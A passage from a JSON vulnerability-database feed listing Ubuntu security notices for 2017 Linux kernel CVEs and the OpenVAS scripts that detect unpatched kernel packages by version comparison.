\nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)", "edition": 6, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3510-1", "href": "https://ubuntu.com/security/notices/USN-3510-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:37:22", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)", "edition": 6, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3511-1", "href": "https://ubuntu.com/security/notices/USN-3511-1", "title": "Linux kernel (Azure) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:44:10", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "description": "USN-3508-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.04. \nThis update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 17.04 for Ubuntu \n16.04 LTS.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nYonggang Guo discovered that a race condition existed in the driver \nsubsystem in the Linux kernel. A local attacker could use this to possibly \ngain administrative privileges. (CVE-2017-12146)", "edition": 5, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3508-2", "href": "https://ubuntu.com/security/notices/USN-3508-2", "title": "Linux kernel (HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:35:01", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nYonggang Guo discovered that a race condition existed in the driver \nsubsystem in the Linux kernel. A local attacker could use this to possibly \ngain administrative privileges. (CVE-2017-12146)", "edition": 6, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3508-1", "href": "https://ubuntu.com/security/notices/USN-3508-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:38:13", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB \ndriver for the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-16643)", "edition": 6, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3509-1", "href": "https://ubuntu.com/security/notices/USN-3509-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:37:56", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "USN-3509-2 fixed vulnerabilities in the Linux Hardware Enablement \nkernel for Ubuntu 14.04 LTS. Unfortunately, it also introduced a \nregression that prevented the Ceph network filesystem from being \nused. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB \ndriver for the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-16643)", "edition": 6, "modified": "2017-12-15T00:00:00", "published": "2017-12-15T00:00:00", "id": "USN-3509-4", "href": "https://ubuntu.com/security/notices/USN-3509-4", "title": "Linux kernel (Xenial HWE) regression", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:40:18", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "USN-3509-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB \ndriver for the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-16643)", "edition": 6, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3509-2", "href": "https://ubuntu.com/security/notices/USN-3509-2", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:34:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "USN-3509-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. Unfortunately, it also introduced a regression that prevented the \nCeph network filesystem from being used. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB \ndriver for the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-16643)", "edition": 6, "modified": "2017-12-15T00:00:00", "published": "2017-12-15T00:00:00", "id": "USN-3509-3", "href": "https://ubuntu.com/security/notices/USN-3509-3", "title": "Linux kernel regression", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T01:41:53", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15306", "CVE-2017-15299", "CVE-2017-12193", "CVE-2017-15951", "CVE-2017-16939", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nEric Biggers discovered that the key management subsystem in the Linux \nkernel did not properly restrict adding a key that already exists but is \nuninstantiated. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code. (CVE-2017-15299)\n\nIt was discovered that a null pointer dereference error existed in the \nPowerPC KVM implementation in the Linux kernel. A local attacker could use \nthis to cause a denial of service (system crash). (CVE-2017-15306)\n\nEric Biggers discovered a race condition in the key management subsystem of \nthe Linux kernel around keys in a negative state. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-15951)", "edition": 6, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3507-2", "href": "https://ubuntu.com/security/notices/USN-3507-2", "title": "Linux kernel (GCP) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843393", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843393", "type": "openvas", "title": "Ubuntu Update for linux-azure USN-3511-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3511_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-azure USN-3511-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843393\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:17 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-azure USN-3511-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-azure'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405)\");\n script_tag(name:\"affected\", value:\"linux-azure on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3511-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3511-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.11.0-1016-azure\", ver:\"4.11.0-1016.16\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-azure\", ver:\"4.11.0.1016.16\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843394", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843394", "type": "openvas", "title": "Ubuntu Update for linux USN-3510-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3510_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3510-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843394\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:23 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3510-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3510-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3510-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-generic\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-generic-lpae\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-lowlatency\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc-e500\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc-e500mc\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc-smp\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc64-emb\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc64-smp\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843397", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843397", "type": "openvas", "title": "Ubuntu Update for linux USN-3508-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3508_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3508-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843397\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:49 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12146\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3508-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405) Yonggang Guo discovered that a race condition existed in the\n driver subsystem in the Linux kernel. A local attacker could use this to\n possibly gain administrative privileges. (CVE-2017-12146)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 17.04\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3508-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3508-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU17\\.04\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-1023-raspi2\", ver:\"4.10.0-1023.26\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic\", ver:\"4.10.0-42.46\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-generic-lpae\", ver:\"4.10.0-42.46\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.10.0-42-lowlatency\", ver:\"4.10.0-42.46\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"4.10.0.42.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"4.10.0.42.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"4.10.0.42.42\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-raspi2\", ver:\"4.10.0.1023.24\", rls:\"UBUNTU17.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843396", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843396", "type": "openvas", "title": "Ubuntu Update for linux-hwe USN-3508-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3508_2.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-hwe USN-3508-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843396\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:42 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12146\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n 